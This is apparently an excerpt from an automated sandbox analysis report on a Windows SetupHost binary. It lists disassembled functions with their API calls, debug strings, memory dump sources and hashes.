                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID: CSystemHelper::SetMainTitle$SetupUI: Setting main title: [%s]
                                                                                                                        • API String ID: 431132790-2238234619
                                                                                                                        • Opcode ID: d5371e2deb55f09b8ef39e714ab538674c454752c0a130d7afbc1c8cd9daf82d
                                                                                                                        • Instruction ID: 1604f7661a9cd129268b61c3bc6017ff15521328b545702dfe26c7265044ccbf
                                                                                                                        • Opcode Fuzzy Hash: d5371e2deb55f09b8ef39e714ab538674c454752c0a130d7afbc1c8cd9daf82d
                                                                                                                        • Instruction Fuzzy Hash: 2D31A474B002158BCF049F75986967EB672EF88B15B15842FEC06EB382DE78DD018B99
                                                                                                                        Function 004E81AA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 95windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 004E8213
                                                                                                                        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 004E827C
                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 004E8286
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorIconLastNotifyShell_memset
                                                                                                                        • String ID: CSystemHelper::RemoveTrayIcon$SetupUI: Removing tray icon...
                                                                                                                        • API String ID: 501942869-4207634123
                                                                                                                        • Opcode ID: b33213d7f76e3506a768fea4f4b429aadafcd6110595576bea98bda8d8ed543e
                                                                                                                        • Instruction ID: d9b80bb9e7aaec3402a4f40f506973f504c48378e65503ae2178efdcdfdf1f20
                                                                                                                        • Opcode Fuzzy Hash: b33213d7f76e3506a768fea4f4b429aadafcd6110595576bea98bda8d8ed543e
                                                                                                                        • Instruction Fuzzy Hash: FF31D074B006188BDB119FA59C59A3EB7B9FF88315F0404AFE905A7380CB749E058B84
                                                                                                                        Function 0054D2FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 0054D306
                                                                                                                        • memset.MSVCRT ref: 0054D34E
                                                                                                                        • RtlGetVersion.NTDLL ref: 0054D367
                                                                                                                          • Part of subcall function 004F9CA1: GetModuleHandleExW.KERNEL32(00000001,ntdll.dll,?,?,?,?,00000000,?,004E7B5C), ref: 004F9CD7
                                                                                                                          • Part of subcall function 004F9CA1: GetLastError.KERNEL32(?,?,?,00000000,?,004E7B5C), ref: 004F9CE1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorH_prolog3_HandleLastModuleVersionmemset
                                                                                                                        • String ID: %d.%d$%d.%d.%d.%d
                                                                                                                        • API String ID: 1866922265-3157913242
                                                                                                                        • Opcode ID: 59497a7429daaee35544efadf7297f6e72a1d2f99be1b7bc6f30020f41c6825b
                                                                                                                        • Instruction ID: 4b9512b4de6fbd28cc5ce303cd29648605de401828ecf7970b68e58ea3f1a747
                                                                                                                        • Opcode Fuzzy Hash: 59497a7429daaee35544efadf7297f6e72a1d2f99be1b7bc6f30020f41c6825b
                                                                                                                        • Instruction Fuzzy Hash: D2317271E002299BCF25AF65CC957EDB6B5BF48308F1004E9E609A7241EB78AF44CF54
                                                                                                                        Function 005143F4 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 142COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • BUCL::Rtl::Add<SIZE_T>( sizeof(MICRODOM_HEADER), cbStringPoolSize, cbDomLayoutSize, cbPositionDataSize, cbDoctypeDataSize, cbRequiredSize), xrefs: 00514583
                                                                                                                        • CMicrodomBuilder::ConstructAndWriteMicrodom, xrefs: 00514575
                                                                                                                        • onecore\base\xml\udom_builder.cpp, xrefs: 0051456A
                                                                                                                        • <GM, xrefs: 00514572
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: memset
                                                                                                                        • String ID: <GM$BUCL::Rtl::Add<SIZE_T>( sizeof(MICRODOM_HEADER), cbStringPoolSize, cbDomLayoutSize, cbPositionDataSize, cbDoctypeDataSize, cbRequiredSize)$CMicrodomBuilder::ConstructAndWriteMicrodom$onecore\base\xml\udom_builder.cpp
                                                                                                                        • API String ID: 2221118986-2803345340
                                                                                                                        • Opcode ID: 4fbe492a8af74db238011328c0d0bf4a6f17dbd5edefde1dc72862377f90fbf3
                                                                                                                        • Instruction ID: 01560cd6f1bafc93cd1291d089fc6180615742818c8fd6568d6cf172728e0d91
                                                                                                                        • Opcode Fuzzy Hash: 4fbe492a8af74db238011328c0d0bf4a6f17dbd5edefde1dc72862377f90fbf3
                                                                                                                        • Instruction Fuzzy Hash: 835183B2E0071A8BDF00DFA4DC856DEBBB6BF94314F15492AE421E7241E774E5448F54
                                                                                                                        Function 0051707A Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 138memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000028,?,00000000,00000278,00513C5C,00000000,000000FF,000000FF,?,?,?,00000000,?), ref: 005170E4
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 005170EB
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0051713E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00517145
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFree
                                                                                                                        • String ID: \<Q
                                                                                                                        • API String ID: 756756679-4118287963
                                                                                                                        • Opcode ID: e2cf42550559680bb3902036b600c4aa45c8a0efe0f55deaac847772f25080d6
                                                                                                                        • Instruction ID: 3ff3254b7571f58ba3fd56c99c54dde0e188417a06f42e10b69bcc2595f170cb
                                                                                                                        • Opcode Fuzzy Hash: e2cf42550559680bb3902036b600c4aa45c8a0efe0f55deaac847772f25080d6
                                                                                                                        • Instruction Fuzzy Hash: 77513E79A0470AAFEB14CF68C854AAABFB9FF4D310F148499E815DB250D731D945CB60
                                                                                                                        Function 0052B3BA Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 74memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000054), ref: 0052B3E2
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0052B3E9
                                                                                                                        • GetLastError.KERNEL32 ref: 0052B3F8
                                                                                                                        • GetLastError.KERNEL32 ref: 0052B40E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorHeapLast$AllocProcess
                                                                                                                        • String ID: WimBufferToHexString
                                                                                                                        • API String ID: 4104531043-2611935240
                                                                                                                        • Opcode ID: cb3b1abcc5efa0c9366e042ecb6ed1103bf9e273e3b789b4b5a1dafadd24c525
                                                                                                                        • Instruction ID: a161b189bac1b9d6db15e3c4bfd0b96abbf949455ba4120b6b0689b86ae893ee
                                                                                                                        • Opcode Fuzzy Hash: cb3b1abcc5efa0c9366e042ecb6ed1103bf9e273e3b789b4b5a1dafadd24c525
                                                                                                                        • Instruction Fuzzy Hash: 9E2108756103359BEB006F69EC9576ABBA5FF46311B018126ED04DB392E730DD00D7E5
                                                                                                                        Function 00540241 Relevance: 7.6, APIs: 6, Instructions: 54memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,59C8DCBE,033264D0,00000000,00000000,00000000,00551005,000000FF,?,00540189), ref: 0054027D
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00540189), ref: 00540284
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000008,?,00540189), ref: 0054029E
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00540189), ref: 005402A5
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00540189), ref: 005402B5
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00540189), ref: 005402BC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3859560861-0
                                                                                                                        • Opcode ID: 9a186b6e4de02507c089a3c451bafd16ae4f5974a111d9204efbf529616e9e90
                                                                                                                        • Instruction ID: 6c1e2483868d48339c830a95c69d21324aa97b803c60455662bbcc62cd15bd68
                                                                                                                        • Opcode Fuzzy Hash: 9a186b6e4de02507c089a3c451bafd16ae4f5974a111d9204efbf529616e9e90
                                                                                                                        • Instruction Fuzzy Hash: 0C01A53A608704BBC7115B64EC5DB5B7FACFBA8752F140569F501C72D0CF7498048A60
                                                                                                                        Function 0054F245 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0054F272
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0054F281
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0054F28A
                                                                                                                        • GetTickCount.KERNEL32 ref: 0054F293
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0054F2A8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1445889803-0
                                                                                                                        • Opcode ID: 49899a2540bdb47769bee8568804a78c5bfb9d2e657c359a38fa2c6e4e7baa93
                                                                                                                        • Instruction ID: e8b25e55215b617c0faafac33b183013e180ef3d74fd7ae78c576b8bf8459bb5
                                                                                                                        • Opcode Fuzzy Hash: 49899a2540bdb47769bee8568804a78c5bfb9d2e657c359a38fa2c6e4e7baa93
                                                                                                                        • Instruction Fuzzy Hash: 5F113A75D05208EBCF11DBB8E9586DEBBF4FF68316F5148A5E801E7210E630AB44AB00
                                                                                                                        Function 005413C4 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,?,?,?,?,00541567,59C8DCBE,00000000,033292B8,?,0055103B,000000FF,?,00541659,?,59C8DCBE), ref: 005413E5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: <unnamed>$CBlackboard::Close$CBlackboard::Close: %s.$onecore\base\ntsetup\panther\engine\bb.cpp
                                                                                                                        • API String ID: 1452528299-3470024171
                                                                                                                        • Opcode ID: b79587feac618a9b32b65b75e4499542cb158625795073ca0bb9086f95d59d4a
                                                                                                                        • Instruction ID: 66e286c7d19ecbdee294323f587fad44f40cf73aca0c3eeea0cd0139070df5df
                                                                                                                        • Opcode Fuzzy Hash: b79587feac618a9b32b65b75e4499542cb158625795073ca0bb9086f95d59d4a
                                                                                                                        • Instruction Fuzzy Hash: D2014972340B063BDF201E915CC6EBB3AADEBC0B59714453FF91842680DA71AC00C6AC
                                                                                                                        Function 005270AF Relevance: 7.5, APIs: 6, Instructions: 35memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00526DD1,?,00000000,00000000,00526E66,00000000,00000000,00000090,0051E0C5,?,00000000,00000000), ref: 005270C2
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000,0051E358,?,?,00000000), ref: 005270C9
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,00526DD1,?,00000000,00000000,00526E66,00000000,00000000,00000090,0051E0C5,?,00000000,00000000), ref: 005270DE
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000,0051E358,?,?,00000000), ref: 005270E5
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00526DD1,?,00000000,00000000,00526E66,00000000,00000000,00000090,0051E0C5,?,00000000,00000000), ref: 005270F4
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000,0051E358,?,?,00000000), ref: 005270FB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3859560861-0
                                                                                                                        • Opcode ID: 7a32ec0b82767b11460b96b52d183be0b4f96047897da4afbcc7d129bf007e54
                                                                                                                        • Instruction ID: 7715df2a69623523f3e7df1e7a452991013369f1baf5805be8bc3396be7b75c3
                                                                                                                        • Opcode Fuzzy Hash: 7a32ec0b82767b11460b96b52d183be0b4f96047897da4afbcc7d129bf007e54
                                                                                                                        • Instruction Fuzzy Hash: B7F0303550872AABC7315F65BC1C92F7EACFF9E712314445DB495810A0CB308945EF60
                                                                                                                        Function 004F82E4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004F82EB
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 004F8331
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 004F835F
                                                                                                                        Strings
                                                                                                                        • CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingsValues, xrefs: 004F8310
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String$AllocFreeH_prolog3
                                                                                                                        • String ID: CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingsValues
                                                                                                                        • API String ID: 2967515224-193024389
                                                                                                                        • Opcode ID: f309a7756d398cdb0294f4f8d90587186dc83c812d929969ea3d72142a675342
                                                                                                                        • Instruction ID: 363a7cd8bf349516db2b634c2213f41b7ef5f7decb5fcbae1692f9d9776e2cb0
                                                                                                                        • Opcode Fuzzy Hash: f309a7756d398cdb0294f4f8d90587186dc83c812d929969ea3d72142a675342
                                                                                                                        • Instruction Fuzzy Hash: 7E01F735A04319C7CB219F14CC44B3E7A61BBD0B24F25855FEE056F351CBB94C029B99
                                                                                                                        Function 004F836F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004F8376
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 004F83BC
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 004F83EA
                                                                                                                        Strings
                                                                                                                        • CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingsParameters, xrefs: 004F839B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String$AllocFreeH_prolog3
                                                                                                                        • String ID: CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingsParameters
                                                                                                                        • API String ID: 2967515224-2852037422
                                                                                                                        • Opcode ID: dae0c5ecaede190c8bb745ad5f84b746b61775cfc924b8ca906767e6e483682d
                                                                                                                        • Instruction ID: 1c1ef2301f5cba9911fbd7e0939b1de372ed5979427794d5871ec0e8a4a0d8a1
                                                                                                                        • Opcode Fuzzy Hash: dae0c5ecaede190c8bb745ad5f84b746b61775cfc924b8ca906767e6e483682d
                                                                                                                        • Instruction Fuzzy Hash: FE01D475A41319C7DB219F148844B3EB562BBD0B20F25456FEE04AF361CBB98C41D79A
                                                                                                                        Function 004F83FA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004F8401
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 004F8467
                                                                                                                          • Part of subcall function 004F858F: __EH_prolog3.LIBCMT ref: 004F8596
                                                                                                                          • Part of subcall function 004F858F: SysFreeString.OLEAUT32(00000000), ref: 004F86B4
                                                                                                                          • Part of subcall function 004F858F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F86C1
                                                                                                                          • Part of subcall function 004F858F: HeapFree.KERNEL32(00000000), ref: 004F86C8
                                                                                                                        • _wtoi.MSVCRT(?,00000000,?,00000004,004EB389,DUCHANNELS_FLAG,?,00000000), ref: 004F8452
                                                                                                                        Strings
                                                                                                                        • CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingAsDword, xrefs: 004F8420
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$H_prolog3HeapString$Process_wtoi
                                                                                                                        • String ID: CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingAsDword
                                                                                                                        • API String ID: 3600190553-2059675238
                                                                                                                        • Opcode ID: 02c35f926858bbcc1bfdbd654a4cb87df265a577405de37af3b2dcd5b5bae632
                                                                                                                        • Instruction ID: d6613177b0938ded60734b593ddee6d0c28e7854536fa8eb197a066240ebda64
                                                                                                                        • Opcode Fuzzy Hash: 02c35f926858bbcc1bfdbd654a4cb87df265a577405de37af3b2dcd5b5bae632
                                                                                                                        • Instruction Fuzzy Hash: 2401867160072EDBCB01AF648851ABE7A65BF88710F10841FFB146F341DF3889029799
                                                                                                                        Function 0051B3AC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • *** Assertion failed: %s*** Source File: %s, line %ld, xrefs: 0051B3E9
                                                                                                                        • CsP, xrefs: 0051B3B1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PrintRaiseStatus
                                                                                                                        • String ID: *** Assertion failed: %s*** Source File: %s, line %ld$CsP
                                                                                                                        • API String ID: 2749562092-3906010137
                                                                                                                        • Opcode ID: 95500f96b2626729e8fac9bf9badfe602c608d6fdbbc4f1bd8dbf3cf3b7ee4c0
                                                                                                                        • Instruction ID: 6a26f729b2a25f6ca2c7456a8183149dd8b94fd287605bfec3a8c4a25017c97c
                                                                                                                        • Opcode Fuzzy Hash: 95500f96b2626729e8fac9bf9badfe602c608d6fdbbc4f1bd8dbf3cf3b7ee4c0
                                                                                                                        • Instruction Fuzzy Hash: C0F0593430120857F71496459C64FAA7F69FFA4316F348C19F914C7101C331EC9287A0
                                                                                                                        Function 005403B6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(?,Def,?,?,?,?,?,?,?,?,00540A7C), ref: 005403DB
                                                                                                                        • SystemTimeToVariantTime.OLEAUT32(?,?), ref: 005403E9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
